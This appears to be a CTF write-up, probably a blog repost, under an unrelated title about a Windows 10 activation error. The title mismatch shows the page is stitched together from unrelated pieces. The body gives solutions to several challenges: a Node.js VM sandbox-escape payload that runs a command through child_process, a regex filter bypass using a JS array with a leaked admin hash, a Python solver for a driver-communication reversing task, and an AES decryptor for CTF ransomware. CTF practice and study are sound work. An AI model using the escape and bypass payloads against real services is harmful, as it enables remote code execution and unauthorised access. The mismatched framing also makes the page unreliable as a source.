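Windows 10 reports activation error 0x8007b: how to fix Win10 activation error 0x8007b

Author: YD166 2024-05-22 06:07:33

The file was read successfully. The next step is to construct a JS vm escape; document.write writes the output straight into the HTML, so no out-of-band exfiltration is needed.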

<script> document.write(this.constructor.constructor.constructor.constructor('return process')().mainModule.require('child_process').execSync('/readflag').toString()); </script>


flag{f0425be6-3e46-472a-8879-e19525839caf}

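5. Secrets_Of_Admin

Got the source code.

admin@e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645

Log in.

Bypass with a JS array: this way the check no longer finds any element that fails to get past the regex. Set checksum to crhyyds, and URL-encode the body when submitting the POST.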

content[]=

The flag obtained is: flag{65453076-effe-48dc-98d5-d0d235f766f8}
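The array trick above works because a check written for strings behaves differently once the body parser hands it an array. The following is an added example, not the challenge's source: `parseForm` is a simplified stand-in for qs-style parsing of `content[]=`, and the `BLOCKED` list and both filters are hypothetical.

```javascript
// Added example, not the challenge's source code.
// Simplified stand-in for qs-style parsing: a key ending in "[]" becomes an array.
function parseForm(body) {
  const out = Object.create(null);
  for (const [rawKey, value] of new URLSearchParams(body)) {
    if (rawKey.endsWith('[]')) {
      const key = rawKey.slice(0, -2);
      if (!Array.isArray(out[key])) out[key] = [];
      out[key].push(value);
    } else {
      out[rawKey] = value;
    }
  }
  return out;
}

// Hypothetical blocklist for a field that is later rendered into HTML.
const BLOCKED = ['<', '>', 'script'];

// Weak: assumes a string. On an array, .includes() compares whole elements,
// so a substring such as "<" is never found inside an element.
function weakFilter(content) {
  if (content === '') return false;
  return !BLOCKED.some((needle) => content.includes(needle));
}

// Hardened: reject anything that is not a non-empty string before matching.
function strictFilter(content) {
  if (typeof content !== 'string' || content.length === 0) return false;
  return !BLOCKED.some((needle) => content.includes(needle));
}

// Constructed sample bodies: the same markup sent as a string and as an array.
const asString = parseForm('content=%3Cb%3Ehi%3C%2Fb%3E').content;
const asArray = parseForm('content[]=%3Cb%3Ehi%3C%2Fb%3E').content;

// When the value is later placed in a template, the array is coerced back
// to the original markup, so the blocked characters reach the output.
function render(content) {
  return `<div>${content}</div>`;
}

console.log(weakFilter(asString), weakFilter(asArray), strictFilter(asArray));
console.log(render(asArray));
```
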

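Reverse

1. **Rev_APC**

The code that generates the DLL.

SHA3-256 was identified, but it was not used later on.

Core logic: function 0x1800015C0 in the DLL communicates with the sys driver in two ways.

  1. Function 0x1800015C0 in the DLL calls NtRequestWaitReplyPort; on the sys side, NtReplyWaitReceivePort receives the message. The function in the sys that actually processes the data is 0x14000298C, and its algorithm is fairly easy to follow.
  2. The DLL calls DeviceIOControl; the corresponding function in the sys is 0x140003660.

After that it is just a matter of reading the algorithm.

exp: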

```python
# Python 2 script; l64 (little-endian 64-bit pack) comes from zio.
from zio import *


def fun6(a, b):
    for i in range(32):
        c = a[i]
        if (c >= 33) & (c <= 79):
            a[i] = (c - 80) & 0xff
            b[i] = (b[i] + a[i]) & 0xff
        elif (c >= 81) & (c <= 127):
            a[i] = c - 48
            b[i] ^= (a[i] >> 4)
        elif (c > 128):
            a[i] = c - 48
            b[i] = (b[i] - a[i]) & 0xff
    return a, b


# Inverse of fun6: the add and subtract branches are swapped.
def defun6(a, b):
    for i in range(32):
        c = a[i]
        if (c >= 33) & (c <= 79):
            a[i] = (c - 80) & 0xff
            b[i] = (b[i] - a[i]) & 0xff
        elif (c >= 81) & (c <= 127):
            a[i] = c - 48
            b[i] ^= (a[i] >> 4)
        elif (c > 128):
            a[i] = c - 48
            b[i] = (b[i] + a[i]) & 0xff
    return a, b


def fun5(a, b):
    for i in range(32):
        b[i] ^= a[i]
    return a, b


def fun4(a, b):
    for i in range(32):
        a[i] = (a[i] - 80) & 0xff
    for i in range(16):
        b[2 * i] ^= (16 * a[2 * i]) & 0xff
        b[2 * i + 1] ^= ((a[2 * i]) >> 4) & 0xf
    return a, b


def fun3(a, b):
    for i in range(32):
        b[i] ^= a[i]
    return a, b


def fun2(a, b):
    for i in range(32):
        a[i] = (a[i] - 80) & 0xff
        b[i] ^= ((a[i] >> 4) & 0xf) | ((a[i] << 4) & 0xf0)
    return a, b


def fun1(a, b):
    for i in range(32):
        a[i] = (a[i] + 16) & 0xff
        b[i] ^= a[i]
    return a, b


def enc():
    b = [ord(c) for c in 'flag{12345678901234567890123456}']
    #b = [91, 36, 164, 45, 64, 21, 144, 29, 194, 5, 189, 39, 240, 29, 80, 137, 178, 73, 216, 105, 177, 245, 80, 59, 99, 154, 94, 170, 79, 175, 153, 126]
    '''
    a3 = '9d5f741799d7e62274f01963516316d2eb6888b737bab0a2b0e1774e3b7389e5'.decode('hex')
    a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7, 0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3, 0xB0, 0xC5, 0xD8, 0xC9, 0xDC]
    a4 = []
    for i in range(32):
        a4.append(ord(a3[i])^a2[i%len(a2)])
    '''
    a = []
    a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7,
          0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3,
          0xB0, 0xC5, 0xD8, 0xC9, 0xDC, 0, 0, 0, 0, 0]
    # a is the running XOR prefix of a2
    for i in range(32):
        c = 0
        for j in range(i + 1):
            c ^= a2[j]
        a.append(c)
    orders = [0, 5, 5, 2, 2, 3, 4, 4, 3, 2, 0, 3, 0, 3, 2, 1, 5, 1, 3, 1,
              5, 5, 2, 4, 0, 0, 4, 5, 4, 4, 5, 5][::-1]
    print '----------'
    for i in range(32):
        print a, ','
        if orders[i] == 0:
            fun1(a, b)
        elif orders[i] == 1:
            fun2(a, b)
        elif orders[i] == 2:
            fun3(a, b)
        elif orders[i] == 3:
            fun4(a, b)
        elif orders[i] == 4:
            fun5(a, b)
        elif orders[i] == 5:
            fun6(a, b)
    print '----------'
    print (b)


def get_aas2(orders):
    b = [ord(c) for c in 'flag{12345678901234567890123456}']
    a = []
    a3 = '9d5f741799d7e62274f01963516316d2eb6888b737bab0a2b0e1774e3b7389e5'.decode('hex')
    a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7,
          0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3,
          0xB0, 0xC5, 0xD8, 0xC9, 0xDC]
    a4 = []
    for i in range(32):
        a4.append(ord(a3[i]) ^ a2[i % len(a2)])
    for i in range(32):
        c = 0
        for j in range(i + 1):
            c ^= a4[j]
        a.append(c)
    aas = []
    for i in range(32):
        aas.append(a[:])
        if orders[i] == 0:
            fun1(a, b)
        elif orders[i] == 1:
            fun2(a, b)
        elif orders[i] == 2:
            fun3(a, b)
        elif orders[i] == 3:
            fun4(a, b)
        elif orders[i] == 4:
            fun5(a, b)
        elif orders[i] == 5:
            fun6(a, b)
    return aas


# Record the state of a before each round so the rounds can be undone in reverse.
def get_aas(orders):
    b = [ord(c) for c in 'flag{12345678901234567890123456}']
    a = []
    a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7,
          0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3,
          0xB0, 0xC5, 0xD8, 0xC9, 0xDC, 0, 0, 0, 0, 0]
    for i in range(32):
        c = 0
        for j in range(i + 1):
            c ^= a2[j]
        a.append(c)
    aas = []
    for i in range(32):
        aas.append(a[:])
        if orders[i] == 0:
            fun1(a, b)
        elif orders[i] == 1:
            fun2(a, b)
        elif orders[i] == 2:
            fun3(a, b)
        elif orders[i] == 3:
            fun4(a, b)
        elif orders[i] == 4:
            fun5(a, b)
        elif orders[i] == 5:
            fun6(a, b)
    return aas


def dec(aas, orders, seed):
    #b = [101, 46, 7, 63, 148, 47, 164, 57, 127, 160, 41, 36, 28, 175, 229, 120, 228, 102, 147, 78, 254, 68, 207, 240, 223, 246, 251, 73, 235, 24, 215, 30]
    #b = [132, 13, 239, 89, 97, 68, 214, 77, 139, 199, 61, 244, 220, 107, 175, 6, 222, 75, 100, 91, 167, 143, 135, 74, 72, 246, 81, 54, 83, 64, 165, 216]
    bs = l64(0x2F34A83A1B38C557) + l64(0xEE8F2F04E4C69739) + l64(0x486FC9246780515E) + l64(0xEBC2C2B0C7BD7F5B)
    b = [ord(i) for i in bs]
    re_orders = orders[::-1]
    # Undo the rounds last to first; the XOR rounds are their own inverse.
    for i in range(32):
        a = aas[31 - i]
        if re_orders[i] == 0:
            fun1(a, b)
        elif re_orders[i] == 1:
            fun2(a, b)
        elif re_orders[i] == 2:
            fun3(a, b)
        elif re_orders[i] == 3:
            fun4(a, b)
        elif re_orders[i] == 4:
            fun5(a, b)
        elif re_orders[i] == 5:
            defun6(a, b)
    #print b
    s = ''.join(chr(i) for i in b)
    is_printable = True
    for i in range(10):
        if b[i] > 0x80:
            is_printable = False
            break
    if is_printable:
        print seed, s
    return is_printable


def srand(s):
    global seed
    seed = s


# microsoft c runtime implementation
def rand():
    global seed
    seed = (seed * 214013 + 2531011) % 2**64
    return (seed >> 16) & 0x7fff


def gen_order(seed=1):
    srand(seed)
    orders = []
    for i in range(32):
        orders.append(rand() % 6)
    return orders


orders = gen_order(seed=1)
aas = get_aas(orders)
dec(aas, orders, 1)
```

flag{Kmode_Umode_Communication!}

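2. **Ransomware decryption**

The main logic of the analyzed program: it first takes a key generated by combining a fixed key with a timestamp and computes its SHA-256, then uses the result as the key to AES-encrypt the contents of the .bmp file, with an IV of 0.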


The code is as follows:

```python
#coding:utf-8
import base64
from hashlib import *
from Crypto.Cipher import AES


def decrypt(data, key):
    # Decrypt one base64-encoded block with AES-ECB
    cryptos = AES.new(key, AES.MODE_ECB)
    decrpytBytes = list(base64.b64decode(data))
    decrpytBytes = bytes(decrpytBytes)
    data = cryptos.decrypt(decrpytBytes)
    return data


key = "f4b6bb19108b56fc60a61fc967c0afbe71d2d9048ac0ffe931c901e75689eb46"[:32]
key = bytes.fromhex(key)
f1 = open("flag.bmp.ctf_crypter", "rb")
f2 = open("flag.bmp", "wb")
data = f1.read()


def xor(enc, data):
    res = []
    for i in range(len(enc)):
        res += [enc[i] ^ data[i]]
    return bytes(res)


# Manual CBC decryption: each decrypted block is XORed with the previous
# ciphertext block. The IV is 0, so the first block needs no XOR.
for i in range(len(data)//16):
    enc = base64.b64encode(data[16*i:16*(i + 1)])
    if i > 0:
        ans = xor(decrypt(enc, key), data[16*(i-1):16*i])
    else:
        ans = decrypt(enc, key)
    f2.write(ans)
f1.close()
f2.close()
```

Decryption yields the flag, which the original post shows as a screenshot of the recovered flag.bmp.
